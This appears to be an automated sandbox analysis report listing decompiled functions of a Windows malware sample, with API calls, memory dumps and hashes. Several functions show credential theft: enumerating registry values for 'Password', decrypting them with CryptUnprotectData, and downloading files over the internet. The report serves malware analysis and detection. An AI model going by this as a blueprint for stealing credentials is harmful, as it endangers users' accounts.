                                    Function 008DE0C0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,0053E4C0), ref: 008DE12D
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DE157
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE18F
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DE19D
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1B8
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1CC
                                    • lstrcat.KERNEL32(?,0052B680), ref: 008DE1E0
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1F4
                                    • lstrcat.KERNEL32(?,0053D9F0), ref: 008DE207
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE23F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008DE246
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 4230089145-0
                                    • Opcode ID: 5aaeb3aca2a37061d9167a54d5aaaa6ff64c41b436adfef116c39993070829cd
                                    • Instruction ID: 7ad953688b78a7273114c21550ee16ca2fed8e132cbf2707cef22feca9978e28
                                    • Opcode Fuzzy Hash: 5aaeb3aca2a37061d9167a54d5aaaa6ff64c41b436adfef116c39993070829cd
                                    • Instruction Fuzzy Hash: 8E616A7591011CABCB54EBA8C944BEEB7B8FF88300F1049A9A549E7391DE74AF85CF50
                                    Function 008C6A10 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C6A3F
                                    • InternetOpenA.WININET(008ED014,00000001,00000000,00000000,00000000), ref: 008C6A6C
                                    • StrCmpCA.SHLWAPI(?,0053E908), ref: 008C6A8A
                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 008C6AAA
                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008C6AC8
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008C6AE1
                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 008C6B06
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008C6B30
                                    • CloseHandle.KERNEL32(00000000), ref: 008C6B50
                                    • InternetCloseHandle.WININET(00000000), ref: 008C6B57
                                    • InternetCloseHandle.WININET(?), ref: 008C6B61
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                    • String ID:
                                    • API String ID: 2500263513-0
                                    • Opcode ID: 98003146becdb06f56e017f2e0595d5c68193ee94076b6ef1f0ba9ce843cc2bb
                                    • Instruction ID: 38f5d32831ee38db90ff230c2c3dfb65d609e738e16e3d0e34ac00aa9d81cf7b
                                    • Opcode Fuzzy Hash: 98003146becdb06f56e017f2e0595d5c68193ee94076b6ef1f0ba9ce843cc2bb
                                    • Instruction Fuzzy Hash: 9B415C71A00219ABDB20DBA4DC45FAE77B8FB44704F108568FA05E7280EF74EE55CBA4
                                    Function 008CBCE9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CBD0F
                                    • lstrlen.KERNEL32(00000000), ref: 008CBD42
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CBD6C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008CBD74
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CBD9C
                                    • lstrlen.KERNEL32(008F509C), ref: 008CBE13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: 3b84b46516798e7f6e113d98cc562c133186ccf94afc699f412a195d0ba9bf6d
                                    • Instruction ID: 58f77eeafc733bd6a20c7ffa654edf539a531387b01b2bdfdad4a43f239379fb
                                    • Opcode Fuzzy Hash: 3b84b46516798e7f6e113d98cc562c133186ccf94afc699f412a195d0ba9bf6d
                                    • Instruction Fuzzy Hash: 42A15B30A01A058FCB24DFA8D94AFAABBB4FF44705F18806DE509D72A1DB35DC56CB91
                                    Function 008E5F10 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E5F5A
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E5F79
                                    • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 008E6044
                                    • memmove.MSVCRT(00000000,00000000,?), ref: 008E60CF
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E6100
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$memmove
                                    • String ID: invalid string position$string too long
                                    • API String ID: 1975243496-4289949731
                                    • Opcode ID: a9aeb4e0ade64946c587388eb8cd0a7b87650f7f3bb05ab4c6f683327dedb53e
                                    • Instruction ID: bc8826a713b7fbeec23f2bd21ac67e9d2bf95607628edd82f613fa7dea47d431
                                    • Opcode Fuzzy Hash: a9aeb4e0ade64946c587388eb8cd0a7b87650f7f3bb05ab4c6f683327dedb53e
                                    • Instruction Fuzzy Hash: A061B330700998DBDB18CF5EC8D496EB7B6FF96308B244919E492D7381EB31ED908B95
                                    Function 008DE169 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE18F
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DE19D
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1B8
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1CC
                                    • lstrcat.KERNEL32(?,0052B680), ref: 008DE1E0
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1F4
                                    • lstrcat.KERNEL32(?,0053D9F0), ref: 008DE207
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE23F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008DE246
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFile
                                    • String ID:
                                    • API String ID: 3428472996-0
                                    • Opcode ID: 8dfbeaa49c2940031df5a32b884813a4727770d81940ff8c02f1e3dddc840d4a
                                    • Instruction ID: 3e550a5da38ec65a88b6856c0fa6af08f2390d391c01f109dfb27c0813ab7218
                                    • Opcode Fuzzy Hash: 8dfbeaa49c2940031df5a32b884813a4727770d81940ff8c02f1e3dddc840d4a
                                    • Instruction Fuzzy Hash: 07415A71910518ABCB14EBA8CC48BEE77B8FF48300F1046A9B959D7291DE34DE868F91
                                    Function 008C79A0 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008C7710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008C7745
                                      • Part of subcall function 008C7710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008C778A
                                      • Part of subcall function 008C7710: StrStrA.SHLWAPI(?,Password), ref: 008C77F8
                                      • Part of subcall function 008C7710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 008C782C
                                      • Part of subcall function 008C7710: HeapFree.KERNEL32(00000000), ref: 008C7833
                                    • lstrcat.KERNEL32(00000000,008F509C), ref: 008C79D0
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C79FD
                                    • lstrcat.KERNEL32(00000000, : ), ref: 008C7A0F
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C7A30
                                    • wsprintfA.USER32 ref: 008C7A50
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C7A79
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C7A87
                                    • lstrcat.KERNEL32(00000000,008F509C), ref: 008C7AA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                    • String ID: :
                                    • API String ID: 398153587-3653984579
                                    • Opcode ID: 140edad4fcff3dc229b5cf637d89f1e8b40a142017539bae288817a2a5c4ae58
                                    • Instruction ID: 8a3e6a94ea37708ebf6f20402e78d64e501b2483cae6c3950e81b0075a3709c4
                                    • Opcode Fuzzy Hash: 140edad4fcff3dc229b5cf637d89f1e8b40a142017539bae288817a2a5c4ae58
                                    • Instruction Fuzzy Hash: D5313D72A14618ABCB10DBE8DC44EBFBB79FB88710B144519E60AD3340DF74E946CBA0
                                    Function 008D8240 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 008D829C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D82D3
                                    • lstrlen.KERNEL32(00000000), ref: 008D82F0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D8327
                                    • lstrlen.KERNEL32(00000000), ref: 008D8344
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D837B
                                    • lstrlen.KERNEL32(00000000), ref: 008D8398
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D83C7
                                    • lstrlen.KERNEL32(00000000), ref: 008D83E1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D8410
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: ca5b1aa80881e4a4754df42f50f9d87a08d492e2ff7942e73d881b3365935b0e
                                    • Instruction ID: 1ef5704e918d893b4d584a394e52df2a7d215853b9a7138db2d40fc91124ed8e
                                    • Opcode Fuzzy Hash: ca5b1aa80881e4a4754df42f50f9d87a08d492e2ff7942e73d881b3365935b0e
                                    • Instruction Fuzzy Hash: CF511671A01612DBDB14DFA8D858B6ABBB9FF44350F114629AC06DB344EF30E961CBE0
                                    Function 008C7710 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008C7745
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008C778A
                                    • StrStrA.SHLWAPI(?,Password), ref: 008C77F8
                                      • Part of subcall function 008C7690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 008C769E
                                      • Part of subcall function 008C7690: RtlAllocateHeap.NTDLL(00000000), ref: 008C76A5
                                      • Part of subcall function 008C7690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008C76CD
                                      • Part of subcall function 008C7690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008C76ED
                                      • Part of subcall function 008C7690: LocalFree.KERNEL32(?), ref: 008C76F7
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008C782C
                                    • HeapFree.KERNEL32(00000000), ref: 008C7833
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 008C7975
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                    • String ID: Password
                                    • API String ID: 356768136-3434357891
                                    • Opcode ID: 69450e2097d968f9b8a3856e37c0963296c305523c28551f00425b17bdb6a60a
                                    • Instruction ID: a8d4359bada8a2a827678b1ba8def4bea3ec35319fe135610a50216b53534670
                                    • Opcode Fuzzy Hash: 69450e2097d968f9b8a3856e37c0963296c305523c28551f00425b17bdb6a60a
                                    • Instruction Fuzzy Hash: B0710DB1D0021DAFDB10DF95C884EEEB7B9FF45300F10456AE605E7200EA759A89CFA5
                                    Function 008E4520 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,008D5328), ref: 008E4565
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E456C
                                    • wsprintfW.USER32 ref: 008E457B
                                    • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 008E45EA
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 008E45F9
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 008E4600
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                    • String ID: %hs
                                    • API String ID: 885711575-2783943728
                                    • Opcode ID: 77b78922c4e7ce4112be403aa56d190c3fdde3acb1e776ce048fda0f59b4aa4f
                                    • Instruction ID: 049d6cafb108674f15257a97bd6e9ca1ade71fe1a1d38e48828c4681861a2daa
                                    • Opcode Fuzzy Hash: 77b78922c4e7ce4112be403aa56d190c3fdde3acb1e776ce048fda0f59b4aa4f
                                    • Instruction Fuzzy Hash: 9D313E71A00209ABEB20DBE5DC49FEE7778FF45700F104155FA0AE6190EB74AA46CBA5
                                    Function 008C1000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C1015
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C101C
